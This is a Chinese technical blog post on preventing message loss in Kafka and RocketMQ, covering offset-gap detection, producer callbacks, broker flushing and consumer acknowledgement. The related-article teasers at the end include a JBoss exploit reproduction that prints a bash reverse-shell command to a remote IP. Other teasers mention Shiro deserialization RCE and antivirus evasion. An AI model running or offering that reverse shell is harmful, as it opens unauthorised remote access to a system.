消息队列:如何确保消息不会丢失?

引言

对业务系统来说,丢消息意味着数据丢失,这是无法接受的。

主流的消息队列产品都提供了非常完善的消息可靠性保证机制,完全可以做到在消息传递过程中,即使发生网络中断或者硬件故障,也能确保消息的可靠传递,不丢消息。

绝大部分丢消息的原因都是由于开发者不熟悉消息队列,没有正确使用和配置消息队列导致的。

虽然不同的消息队列提供的 API 不一样,相关的配置项也不同,但是在保证消息可靠传递这块儿,它们的实现原理是一样的。

检测消息丢失

消息队列的有序性

在这里插入图片描述
大概流程如下:

  1. 发送端在拦截器中,给每条消息附加一个连续递增的序号;
  2. 消费端在拦截器中检测消息的连续性,如果消息没有丢失,消息序号必然是库中保存的上一次消费到的消息序号+1;

对于 kafka 和 rocketmq,不保证在 Topic 上的严格顺序,只能保证分区上的消息是有序的,所以我们在发消息的时候必须要指定分区,并且,在每个分区单独检测消息序号的连续性。

如果 Producer 是多实例的,由于并不好协调多个 Producer 之间的发送顺序,所以也需要每个 Producer 分别生成各自的消息序号,并且需要附加上 Producer 的标识,在 Consumer 端按照每个 Producer 分别来检测序号的连续性。

除了在拦截器生成消息序号外,我们也可以利用消息位移来实现。

位移(Offset)是消息队列中用于标识消息位置的指标,它指向了消息在队列中的确切位置。在如Kafka这样的消息队列中,位移是消费者读取消息的起始点。消费者在读取消息后,会更新位移,表明已经读取了这些消息。如果位移连续,那么可以认为没有消息丢失。如果位移不连续,比如位移从100直接跳到了102,那么101的消息就可能丢失了。

例如:

 public void onMessage(List<ConsumerRecord<String, EventRecord>> data, Acknowledgment acknowledgment) {try {/*** * 业务处理* * */long initStartOffset = redisCluster.exists(String.format(Constants.INIT_OFFSET, bizName))? Long.valueOf(redisCluster.get(String.format(Constants.INIT_OFFSET, bizName))): 0L;if (initStartOffset == 0) {redisCluster.set(String.format(Constants.INIT_OFFSET, bizName), String.valueOf(data.stream().mapToLong(ConsumerRecord<String, EventRecord>::offset).max().getAsLong()));acknowledgment.acknowledge();return;}long minOffsetRecord = data.stream().mapToLong(ConsumerRecord<String, EventRecord>::offset).min().getAsLong();long maxOffsetRecord = data.stream().mapToLong(ConsumerRecord<String, EventRecord>::offset).max().getAsLong();log.info("initStartOffset={}, minOffsetRecord={}, maxOffsetRecord={}", initStartOffset, minOffsetRecord, maxOffsetRecord);if (minOffsetRecord - initStartOffset > 1) {log.info(String.format(Constants.INIT_OFFSET, bizName) + "存在数据丢失。。。。。。。。。。。。。。。。。。minOffsetRecord = " + minOffsetRecord+ ",initStartOffset = " + initStartOffset);consumeUtils.sendDingWarn("同步消费异常", bizName + "数据丢失!!!!!!!");}redisCluster.set(String.format(Constants.INIT_OFFSET, bizName), String.valueOf(maxOffsetRecord));acknowledgment.acknowledge();} catch (Exception e) {throw new RuntimeException("kafka message process error!", e);}}

在检测到消息丢失时,我们可以钉钉报警,也可以直接抛出异常,停止消费。

确保消息可靠传递

在这里插入图片描述

  • 生产阶段: 消息在 Producer 创建出来,经过网络传输发送到 Broker 端;
  • 存储阶段: 消息在 Broker 端存储,如果是集群,消息会在这个阶段被复制到其他的副本上;
  • 消费阶段: Consumer 从 Broker 上拉取消息,经过网络传输发送到 Consumer 上。

在上面三个阶段中,哪些会发生消息丢失呢?

生产阶段

在生产阶段,消息队列通过最常用的请求确认机制,来保证消息的可靠传递:当代码调用发消息方法时,消息队列的客户端会把消息发送到 Broker,Broker 收到消息后,会给客户端返回一个确认响应,表明消息已经收到了。客户端收到响应后,完成了一次正常消息的发送。

只要 Producer 收到了 Broker 的确认响应,就可以保证消息在生产阶段不会丢失。

有些消息队列在长时间没收到发送确认响应后,会自动重试,如果重试再失败,就会以返回值或者异常的方式告知用户。

在编写发送消息代码时,需要注意,正确处理返回值或者捕获异常,就可以保证这个阶段的消息不会丢失。

以 Kafka 为例,我们看一下如何可靠地发送消息:同步发送时,只要注意捕获异常即可。

try {RecordMetadata metadata = producer.send(record).get();System.out.println("消息发送成功。");
} catch (Throwable e) {System.out.println("消息发送失败!");System.out.println(e);
}

异步发送时,则需要在回调方法里进行检查。这个地方是需要特别注意的,很多丢消息的原因就是,我们使用了异步发送,却没有在回调中检查发送结果。

producer.send(record, (metadata, exception) -> {if (metadata != null) {System.out.println("消息发送成功。");} else {System.out.println("消息发送失败!");System.out.println(exception);}
});

存储阶段

在存储阶段正常情况下,只要 Broker 在正常运行,就不会出现丢失消息的问题,但是如果 Broker 出现了故障,比如进程死掉了或者服务器宕机了,还是可能会丢失消息的。

如果对消息的可靠性要求非常高,可以通过配置 Broker 参数来避免因为宕机丢消息。

对于单个节点的 Broker,需要配置 Broker 参数,在收到消息后,将消息写入磁盘后再给 Producer 返回确认响应,这样即使发生宕机,由于消息已经被写入磁盘,就不会丢失消息,恢复后还可以继续消费。例如,在 RocketMQ 中,需要将刷盘方式 flushDiskType 配置为 SYNC_FLUSH 同步刷盘。

如果是 Broker 是由多个节点组成的集群,需要将 Broker 集群配置成:至少将消息发送到 2 个以上的节点,再给客户端回复发送确认响应。这样当某个 Broker 宕机时,其他的 Broker 可以替代宕机的 Broker,也不会发生消息丢失。

消费阶段

消费阶段采用和生产阶段类似的确认机制来保证消息的可靠传递,客户端从 Broker 拉取消息后,执行用户的消费业务逻辑,成功后,才会给 Broker 发送消费确认响应。如果 Broker 没有收到消费确认响应,下次拉消息的时候还会返回同一条消息,确保消息不会在网络传输过程中丢失,也不会因为客户端在执行消费逻辑中出错导致丢失。

编写消费代码时需要注意的是,不要在收到消息后就立即发送消费确认,而是应该在执行完所有消费业务逻辑之后,再发送消费确认。

比如,上面的那段代码,只有业务逻辑处理完成后,才会发送消费确认。

acknowledgment.acknowledge();

参考资料
《消息队列高手课》

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1543487.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

智能优化算法-多目标灰狼优化算法(MOGWO)(附源码)

目录 1.内容介绍 2.部分代码 3.实验结果 4.内容获取 1.内容介绍 多目标灰狼优化算法 (Multi-Objective Grey Wolf Optimizer, MOGWO) 是一种基于群体智能的元启发式优化算法&#xff0c;它扩展了经典的灰狼优化算法 (GWO)&#xff0c;专门用于解决多目标优化问题。MOGWO通过模…

IT监控管理工具 WGCLOUD - 使用公共告警消息推送接口

WGCLOUD的公共告警接口 用于外部业务系统调用的告警接口&#xff0c;需要升级到v3.4.5或以上版本 只要调用这个接口&#xff0c;就可以将消息同步推送到我们的告警平台&#xff0c;比如邮件&#xff0c;钉钉&#xff0c;企业微信等 此接口主要给有告警需求的第三方系统使用&…

软件功能测试需进行哪些测试?第三方软件测评机构有哪些测试方法?

在信息化社会迅速发展的今天&#xff0c;软件功能测试在软件开发生命周期中占据着不可或缺的地位。软件功能测试是评估软件系统是否符合预期功能和用户需求的过程。其重要性体现在提升软件质量、确保用户满意度以及降低维护成本等方面。 软件功能测试是对软件应用程序进行的一…

软件测试实验室如何利用GB/T25000标准建立测试技术体系

《系统与软件工程 系统与软件质量要求和评价&#xff08;SQuaRE&#xff09;》是国际标准化组织ISO/IEC为统一软件质量评判标准而指定的软件质量度量和评价的标准。该标准是开展中国合格评定国家认可委员会&#xff08;CNAS&#xff09;实验室认可软件测评实验室过程中需要参照…

开源模型应用落地-Qwen2.5-Coder模型小试-码无止境(一)

一、前言 代码专家模型是一种基于人工智能的先进技术&#xff0c;旨在自动分析和理解大量代码库&#xff0c;并从中学习常见的编码模式和最佳实践。这种模型通过深度学习和自然语言处理&#xff0c;能够提供准确而高效的代码建议&#xff0c;帮助开发人员在编写代码时有效地避免…

[ComfyUI]Flux:太美啦!绮梦流光-水湄凝香,写实与虚拟混合,极致细节和质感

大家好我是安琪&#xff01;&#xff01;&#xff01; 在数字艺术和创意领域&#xff0c;[ComfyUI]Flux已经成为艺术家和设计师们手中的利器。今天&#xff0c;我们激动地宣布&#xff0c;[ComfyUI]Flux带来了一款令人瞩目的创新作品——绮梦流光-水湄凝香。这款作品将写实与虚…

怎么把kgm转换成mp3?5个kgm转mp3的方法,亲测管用!

很多小伙伴不难发现kgm格式只能在固定的平台或设备上播放&#xff0c;如果想要打破这一限制&#xff0c;我们可以将kgm格式转换为兼容性较强的mp3格式。 下面&#xff0c;就来给大家分享5个好用的kgm转mp3方法&#xff0c;操作简单&#xff0c;小白也能分分钟学会哦~ kgm转mp3…

全民皆信奥?编程教育不应成为‘金牌梦’的牺牲品

近年来&#xff0c;信息学奥赛&#xff08;信奥&#xff09;成为众多家长为孩子规划的学习目标之一&#xff0c;期望通过编程学习在未来脱颖而出&#xff0c;甚至进入清华、北大等顶尖高校。然而&#xff0c;是否每个孩子都适合走这条信息学奥赛的道路&#xff1f;全民皆信奥是…

多机器学习模型学习

特征处理 import os import numpy as np import pandas as pd from sklearn.model_selection import train_test_split from sklearn.model_selection import StratifiedShuffleSplit from sklearn.impute import SimpleImputer from sklearn.pipeline import FeatureUnion fr…

JBOSS中间件漏洞复现

CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…

MySQL之基本查询(二)(update || delete || 聚合函数 || group by)

目录 一、表的更新update 二、表的删除delete 三、聚合函数 四、group by 分组查询 一、表的更新update 语法&#xff1a; UPDATE table_name SET column expr [, column expr ...] [WHERE ...] [ORDER BY ...] [LIMIT ...] 使用实列&#xff1a; ~ 将孙悟空同学的数学…

Shiro rememberMe反序列化漏洞(Shiro-550) 靶场攻略

漏洞原理 Apache Shiro框架提供了记住密码的功能&#xff08;RememberMe&#xff09;&#xff0c;⽤户登录成功后会⽣成经过 加密并编码的cookie。在服务端对rememberMe的cookie值&#xff0c;先base64解码然后AES解密再反 序列化&#xff0c;就导致了反序列化RCE漏洞。 那么&a…

杀软对抗 ---> Perfect Syscall??

好久没更了&#xff0c;今天想起来更新了&#x1f60b;&#x1f60b;&#x1f60b;&#x1f60b; 目录 1.AV && EDR 2.Perfect Syscall&#xff1f;&#xff1f; 3.Truly Perfect ??? 在开始之前先来展示一下这次的免杀效果 1.AV && EDR 360 天擎EDR …

Redis事务总结

1.事务介绍 Redis 事务是一个用于将多个命令打包在一起执行的功能&#xff0c;它可以确保这些命令按照顺序执行&#xff0c;并且具有原子性。这意味着事务中的命令要么全部执行&#xff0c;要么全部不执行&#xff0c;这有助于保持数据的一致性。 Redis 事务本质&#xff1a;…

教你轻松搞定西门子PLC与三菱PLC之间无线Modbus通讯

自第一台PLC在GM公司汽车生产线上首次应用成功以来&#xff0c;PLC凭借其方便性、可靠性以及低廉的价格得到了广泛的应用。在现代化工厂中&#xff0c;除厂级PLC系统外&#xff0c;还存在很多独立的子系统。比如&#xff0c;各个生产车间的PLC系统、或同一生产车间的不同生产流…

JavaSE高级(3)——lombok、juint单元测试、断言

一、lombok的使用 默认jvm不解析第三方注解&#xff0c;需要手动开启 链式调用 二、juint单元测试 下载juint包 public class TestDemo {// 在每一个单元测试方法执行之前执行Beforepublic void before() {// 例如可以在before部分创建IO流System.out.println("befor…

【大模型实战篇】大模型GPU推理测试(以Qwen2.5-7B为例)

1. 背景介绍 今天到了两块新的3090卡&#xff0c;用nvidia-smi看下部署情况。我们使用Qwen2.5-7B简单做了下推理测试。 3090卡的基本配置信息如下图所示&#xff0c;使用两块卡做成GPU集群&#xff0c;显存有48G&#xff0c;内存带宽936.2 GB/s&#xff0c; 基本上可以应对…

【OpenCV】场景中人的识别与前端计数

1.OpenCV代码设计讲解 突发奇想&#xff0c;搞个摄像头&#xff0c;识别一下实验室里面有几个人&#xff0c;计数一下&#xff08;最终代码是累加计数&#xff0c;没有优化&#xff09;&#xff0c;拿OpenCV来玩一玩 首先&#xff0c;还是优先启动电脑摄像头&#xff0c;本项…

实验十七:串口通信实验

串口通信实验硬件接口图 具体原理可以查看相应的资料和视频 现就代码分享如下; main.c #include<reg52.h>typedef unsigned int u16; typedef unsigned char u8;sbit LED1=P2^0;void delay_10us(u16 n) {while(n--); }int n=0;void delay_ms(u16 ms) {u16 i,j;for(i=…

在线思维导图怎么制作?只需要台这些组合分析法!

思维导图经历了漫长的进化&#xff0c;现已成为信息组织、记忆和头脑风暴的重要工具。其制作方式主要有手绘和软件两种&#xff0c;随着互联网的发展&#xff0c;软件制作因其便捷性和易于保存逐渐占据主导。如今&#xff0c;在线工具使得用户能够免费创建思维导图。本文将以即…